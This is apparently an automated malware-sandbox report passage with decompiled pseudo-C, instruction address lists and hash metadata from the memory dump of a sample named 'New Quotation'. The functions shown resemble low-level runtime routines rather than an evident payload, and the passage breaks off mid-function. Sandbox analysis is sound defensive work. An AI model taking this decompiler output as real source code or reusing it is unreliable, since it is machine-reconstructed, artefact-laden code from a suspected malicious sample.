					_t31 = _t86 + 0x1d7a1898; // 0x1d84e9f0
					_t136 =  *_t31;
					_t118 = _t136;
					 *0x1d8c91e0( *((intOrPtr*)(_t141 - 0x20)), _t141 - 0x30, _t141 - 0x50);
					_t88 =  *_t136();
					if(_t88 < 0) {
						L31:
						_t132 = _t88;
						goto L32;
					} else {
						if( *((intOrPtr*)(_t141 - 0x30)) != 0) {
							_push(_t141 - 0x24);
							_push( *((intOrPtr*)(_t141 - 0x30)));
							_push( *((intOrPtr*)(_t141 - 0x20)));
							_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d7a189c));
							while(1) {
								_t118 = _t136;
								 *0x1d8c91e0();
								_t88 =  *_t136();
								if(_t88 < 0) {
									goto L31;
								}
								if( *((intOrPtr*)(_t141 - 0x24)) !=  *((intOrPtr*)(_t141 - 0x30))) {
									_t94 =  *((intOrPtr*)(_t141 - 0x44));
									if(_t94 != 0) {
										_t95 = _t94 - 1;
										 *((intOrPtr*)(_t141 - 0x44)) = _t95;
										 *((intOrPtr*)(_t141 - 0x5c)) = _t95;
										_t125 =  *((intOrPtr*)(_t141 - 0x28)) +  *(_t141 - 0x34) * 0x12c;
										 *((intOrPtr*)(_t141 - 0x28)) = _t125;
										 *(_t141 - 0x34) = 1;
										 *((intOrPtr*)(_t141 - 0x58)) = 1;
										if( *((intOrPtr*)(_t141 + 0xc)) >= _t125) {
											 *_t115 = 0x12c;
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d7a18a0));
											_t118 = _t136;
											 *0x1d8c91e0( *((intOrPtr*)(_t141 - 0x20)), _t115 + 4,  *((intOrPtr*)(_t141 - 0x24)),  *((intOrPtr*)(_t141 - 0x50)),  *((intOrPtr*)(_t141 - 0x40)));
											_t88 =  *_t136();
											if(_t88 < 0) {
												goto L31;
											} else {
												_t128 =  *(_t115 + 0xc);
												if(_t128 == 0) {
													 *(_t141 - 0x34) = 0;
													 *((intOrPtr*)(_t141 - 0x58)) = 0;
													goto L28;
												} else {
													_t128 = _t128 + 0x3c;
													_t136 =  *((intOrPtr*)(_t141 - 0x20));
													_t118 = _t136;
													_t88 = E1D84F5EC(_t118, _t128, _t141 - 0x54, "true");
													if(_t88 < 0) {
														goto L31;
													} else {
														_t127 =  *(_t115 + 0xc) +  *((intOrPtr*)(_t141 - 0x54));
														 *((intOrPtr*)(_t141 - 0x48)) = _t127;
														_t128 = _t127 + 8;
														_t118 = _t136;
														_t88 = E1D84F5EC(_t118, _t128, _t115 + 0x124, "true");
														if(_t88 < 0) {
															goto L31;
														} else {
															_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x58;
															_t118 = _t136;
															_t88 = E1D84F5EC(_t118, _t128, _t115 + 0x120, "true");
															if(_t88 < 0) {
																goto L31;
															} else {
																_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x34;
																_t118 = _t136;
																_t88 = E1D84F5EC(_t118, _t128, _t115 + 0x128, "true");
																if(_t88 < 0) {
																	goto L31;
																} else {
																	_t115 = _t115 + 0x12c;
																	 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
																	 *_t115 = 0;
																	goto L29;
																}
															}
														}
													}
												}
											}
										} else {
											_t132 = 0xc0000004;
											 *((intOrPtr*)(_t141 - 0x1c)) = 0xc0000004;
											L28:
											_t139 =  *((intOrPtr*)(_t141 - 0x20));
											L29:
											_push(_t141 - 0x24);
											_push( *((intOrPtr*)(_t141 - 0x24)));
											_push(_t139);
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d7a189c));
											continue;
										}
									} else {
										_t132 = 0xc0000229;
										L32:
										 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
									}
								}
								goto L33;
							}
							goto L31;
						}
					}
					L33:
					 *(_t141 - 4) = 0xfffffffe;
					E1D84EE16();
					_t84 =  *(_t141 - 0x2c) + 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
				return _t132;
			}


















                                                                                                                                                                                          0x1d84ebd0
                                                                                                                                                                                          0x1d84ebd0
                                                                                                                                                                                          0x1d84ebd2
                                                                                                                                                                                          0x1d84ebd7
                                                                                                                                                                                          0x1d84ebdc
                                                                                                                                                                                          0x1d84ebdf
                                                                                                                                                                                          0x1d84ebe1
                                                                                                                                                                                          0x1d84ebe6
                                                                                                                                                                                          0x1d84ebe7
                                                                                                                                                                                          0x1d84ebea
                                                                                                                                                                                          0x1d84ebee
                                                                                                                                                                                          0x1d84ebf5
                                                                                                                                                                                          0x1d84ebff
                                                                                                                                                                                          0x1d84ec0a
                                                                                                                                                                                          0x1d84ec0f
                                                                                                                                                                                          0x1d84ec12
                                                                                                                                                                                          0x1d84ec01
                                                                                                                                                                                          0x1d84ec01
                                                                                                                                                                                          0x1d84ec06
                                                                                                                                                                                          0x1d84ec06
                                                                                                                                                                                          0x1d84ec14
                                                                                                                                                                                          0x1d84ec17
                                                                                                                                                                                          0x1d84ec1c
                                                                                                                                                                                          0x1d84ec23
                                                                                                                                                                                          0x1d84ec26
                                                                                                                                                                                          0x1d84ec26
                                                                                                                                                                                          0x1d84ec29
                                                                                                                                                                                          0x1d84ec2c
                                                                                                                                                                                          0x1d84ec2e
                                                                                                                                                                                          0x1d84ec31
                                                                                                                                                                                          0x1d84ec31
                                                                                                                                                                                          0x1d84ec37
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ec3d
                                                                                                                                                                                          0x1d84ec44
                                                                                                                                                                                          0x1d84ec4d
                                                                                                                                                                                          0x1d84ec4f
                                                                                                                                                                                          0x1d84ec4f
                                                                                                                                                                                          0x1d84ec54
                                                                                                                                                                                          0x1d84ec59
                                                                                                                                                                                          0x1d84ec61
                                                                                                                                                                                          0x1d84ec67
                                                                                                                                                                                          0x1d84ec69
                                                                                                                                                                                          0x1d84ec69
                                                                                                                                                                                          0x1d84ec6c
                                                                                                                                                                                          0x1d84ec70
                                                                                                                                                                                          0x1d84ec73
                                                                                                                                                                                          0x1d84ec81
                                                                                                                                                                                          0x1d84ec81
                                                                                                                                                                                          0x1d84ec87
                                                                                                                                                                                          0x1d84ec89
                                                                                                                                                                                          0x1d84ec8f
                                                                                                                                                                                          0x1d84ec93
                                                                                                                                                                                          0x1d84edf0
                                                                                                                                                                                          0x1d84edf0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ec99
                                                                                                                                                                                          0x1d84ec9d
                                                                                                                                                                                          0x1d84eca6
                                                                                                                                                                                          0x1d84eca7
                                                                                                                                                                                          0x1d84ecaa
                                                                                                                                                                                          0x1d84ecb0
                                                                                                                                                                                          0x1d84edde
                                                                                                                                                                                          0x1d84edde
                                                                                                                                                                                          0x1d84ede0
                                                                                                                                                                                          0x1d84ede6
                                                                                                                                                                                          0x1d84edea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ecc1
                                                                                                                                                                                          0x1d84ecc7
                                                                                                                                                                                          0x1d84eccc
                                                                                                                                                                                          0x1d84ecd8
                                                                                                                                                                                          0x1d84ecd9
                                                                                                                                                                                          0x1d84ecdc
                                                                                                                                                                                          0x1d84ece9
                                                                                                                                                                                          0x1d84eceb
                                                                                                                                                                                          0x1d84ecf1
                                                                                                                                                                                          0x1d84ecf4
                                                                                                                                                                                          0x1d84ecfa
                                                                                                                                                                                          0x1d84ed0e
                                                                                                                                                                                          0x1d84ed24
                                                                                                                                                                                          0x1d84ed2a
                                                                                                                                                                                          0x1d84ed2c
                                                                                                                                                                                          0x1d84ed32
                                                                                                                                                                                          0x1d84ed36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ed3c
                                                                                                                                                                                          0x1d84ed3c
                                                                                                                                                                                          0x1d84ed41
                                                                                                                                                                                          0x1d84edc4
                                                                                                                                                                                          0x1d84edc7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ed43
                                                                                                                                                                                          0x1d84ed49
                                                                                                                                                                                          0x1d84ed4c
                                                                                                                                                                                          0x1d84ed4f
                                                                                                                                                                                          0x1d84ed51
                                                                                                                                                                                          0x1d84ed58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ed5e
                                                                                                                                                                                          0x1d84ed61
                                                                                                                                                                                          0x1d84ed64
                                                                                                                                                                                          0x1d84ed70
                                                                                                                                                                                          0x1d84ed73
                                                                                                                                                                                          0x1d84ed75
                                                                                                                                                                                          0x1d84ed7c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ed7e
                                                                                                                                                                                          0x1d84ed8a
                                                                                                                                                                                          0x1d84ed8d
                                                                                                                                                                                          0x1d84ed8f
                                                                                                                                                                                          0x1d84ed96
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ed98
                                                                                                                                                                                          0x1d84eda4
                                                                                                                                                                                          0x1d84eda7
                                                                                                                                                                                          0x1d84eda9
                                                                                                                                                                                          0x1d84edb0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84edb2
                                                                                                                                                                                          0x1d84edb2
                                                                                                                                                                                          0x1d84edb8
                                                                                                                                                                                          0x1d84edbd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84edbd
                                                                                                                                                                                          0x1d84edb0
                                                                                                                                                                                          0x1d84ed96
                                                                                                                                                                                          0x1d84ed7c
                                                                                                                                                                                          0x1d84ed58
                                                                                                                                                                                          0x1d84ed41
                                                                                                                                                                                          0x1d84ecfc
                                                                                                                                                                                          0x1d84ecfc
                                                                                                                                                                                          0x1d84ed01
                                                                                                                                                                                          0x1d84edca
                                                                                                                                                                                          0x1d84edca
                                                                                                                                                                                          0x1d84edcd
                                                                                                                                                                                          0x1d84edd0
                                                                                                                                                                                          0x1d84edd1
                                                                                                                                                                                          0x1d84edd4
                                                                                                                                                                                          0x1d84edd8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84edd8
                                                                                                                                                                                          0x1d84ecce
                                                                                                                                                                                          0x1d84ecce
                                                                                                                                                                                          0x1d84edf2
                                                                                                                                                                                          0x1d84edf2
                                                                                                                                                                                          0x1d84edf2
                                                                                                                                                                                          0x1d84eccc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84ecc1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84edde
                                                                                                                                                                                          0x1d84ec9d
                                                                                                                                                                                          0x1d84edf5
                                                                                                                                                                                          0x1d84edf5
                                                                                                                                                                                          0x1d84edfc
                                                                                                                                                                                          0x1d84ee04
                                                                                                                                                                                          0x1d84ee04
                                                                                                                                                                                          0x1d84ee47
                                                                                                                                                                                          0x1d84ee53

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: 769076d06a4ef0bce096971f65e0edef7d93c3b803cc98e99dc8f15a1e70dda8
                                                                                                                                                                                          • Instruction ID: f4857068a7554c06b0c148657fcce8a7886f1912e4524e9c5827c1a94bed4ace
                                                                                                                                                                                          • Opcode Fuzzy Hash: 769076d06a4ef0bce096971f65e0edef7d93c3b803cc98e99dc8f15a1e70dda8
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2713571E0422D9FDF06CFA8D984BEDBBB5BF48350F25802AE905AB290D734A905CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8AA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: 9290e77d9c1d9cfa213a643d8559ca37f309619800b8c8e11be4c6f2129aa0c6
                                                                                                                                                                                          • Instruction ID: 0d0fffe70314c9336578ccbb030510b294563b69af1a4453ca6e7583251b08f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9290e77d9c1d9cfa213a643d8559ca37f309619800b8c8e11be4c6f2129aa0c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F515B35700A26EFDB09CF18C8D5A2AB7E1FB89710B11416DE90AD7B10DB75EC41CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: c1ad920fcc3513b660ca0ff21eecbd58fccbf90d04988bce478055c1c12ad6c8
                                                                                                                                                                                          • Instruction ID: 8437c46acac1f7e80c61a965a2651ce5fa977c11f0e949be1b4c3b34a5e4b0d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ad920fcc3513b660ca0ff21eecbd58fccbf90d04988bce478055c1c12ad6c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 80511272E0422CDFDF05CF98D844BEDBBB1BF48350F25816AE805AB290E735A901CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D807A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 29%
                                                                                                                                                                                          			E1D807A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push(0x30);
				_push(0x1d8ac840);
				E1D827BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x1d8c5a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x1d8c91e0();
					E1D80B490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x1d8c5d38; // 0x38dfdbe0
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x1d8c65fc; // 0x4e8a32e0
					if(__eflags == 0) {
						_push(0);
						_push("true");
						_push(_t73 - 0x2c);
						_push(0x24);
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E1D812B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E1D828AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x1d8c65fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x1d8c65fc; // 0x4e8a32e0
					 *(_t73 - 0x20) = _t35;
					_push(0x20);
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E1D888890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x1d7a50b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x1d8c91e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x1d8c91e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}











                                                                                                                                                                                          0x1d807a4f
                                                                                                                                                                                          0x1d807a4f
                                                                                                                                                                                          0x1d807a4f
                                                                                                                                                                                          0x1d807a51
                                                                                                                                                                                          0x1d807a56
                                                                                                                                                                                          0x1d807a5b
                                                                                                                                                                                          0x1d807a5d
                                                                                                                                                                                          0x1d807a61
                                                                                                                                                                                          0x1d807a67
                                                                                                                                                                                          0x1d807a6a
                                                                                                                                                                                          0x1d8447f8
                                                                                                                                                                                          0x1d844801
                                                                                                                                                                                          0x1d844806
                                                                                                                                                                                          0x1d84480d
                                                                                                                                                                                          0x1d844810
                                                                                                                                                                                          0x1d844813
                                                                                                                                                                                          0x1d844818
                                                                                                                                                                                          0x1d84481d
                                                                                                                                                                                          0x1d844823
                                                                                                                                                                                          0x1d844825
                                                                                                                                                                                          0x1d844826
                                                                                                                                                                                          0x1d84482b
                                                                                                                                                                                          0x1d84482c
                                                                                                                                                                                          0x1d84482e
                                                                                                                                                                                          0x1d844835
                                                                                                                                                                                          0x1d844838
                                                                                                                                                                                          0x1d84483b
                                                                                                                                                                                          0x1d844840
                                                                                                                                                                                          0x1d844840
                                                                                                                                                                                          0x1d844848
                                                                                                                                                                                          0x1d844848
                                                                                                                                                                                          0x1d84484d
                                                                                                                                                                                          0x1d844852
                                                                                                                                                                                          0x1d84485b
                                                                                                                                                                                          0x1d844863
                                                                                                                                                                                          0x1d844865
                                                                                                                                                                                          0x1d84486b
                                                                                                                                                                                          0x1d84486b
                                                                                                                                                                                          0x1d84486e
                                                                                                                                                                                          0x1d844871
                                                                                                                                                                                          0x1d844892
                                                                                                                                                                                          0x1d844895
                                                                                                                                                                                          0x1d844873
                                                                                                                                                                                          0x1d84487b
                                                                                                                                                                                          0x1d844881
                                                                                                                                                                                          0x1d844881
                                                                                                                                                                                          0x1d844898
                                                                                                                                                                                          0x1d84489e
                                                                                                                                                                                          0x1d807a70
                                                                                                                                                                                          0x1d807a72
                                                                                                                                                                                          0x1d807a7c
                                                                                                                                                                                          0x1d8448ac
                                                                                                                                                                                          0x1d8448b6
                                                                                                                                                                                          0x1d8448c2
                                                                                                                                                                                          0x1d8448c2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4281723722-0
                                                                                                                                                                                          • Opcode ID: 8bfe11fd75103dff1a50220738d4982e1b74df40846f81f64b558f9c6b4763a3
                                                                                                                                                                                          • Instruction ID: 3715d0adc553fdbdb34e0e45efbbb9c1f8e46c4ef802c15955e5c43daf1328d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bfe11fd75103dff1a50220738d4982e1b74df40846f81f64b558f9c6b4763a3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09310F75E00228DFCF05DFA9D885B9EBBB0AB4C760F21816AE511B7290DB34A900CF52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E1D7D58E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x1d8abd28);
				_push(E1D81AD20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x1d8cb370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E1D7D8120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E1D7D80BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E1D7D8009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E1D818F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L1D7D53C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E1D7D6055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E1D7D6074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E1D7D6179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E1D80B490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E1D7D63CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L1D7E2330(_t268, _t377 + 0x2c);
										E1D8A4407(_t377);
										E1D7E24D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E1D7D64F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x1d8c6644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E1D7E5D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E1D8146E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E1D818F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											E1D7D6D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E1D7D6D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E1D7D6E00;
											if(_t342 == E1D7D6E00) {
												E1D7D6E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E1D7D61C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
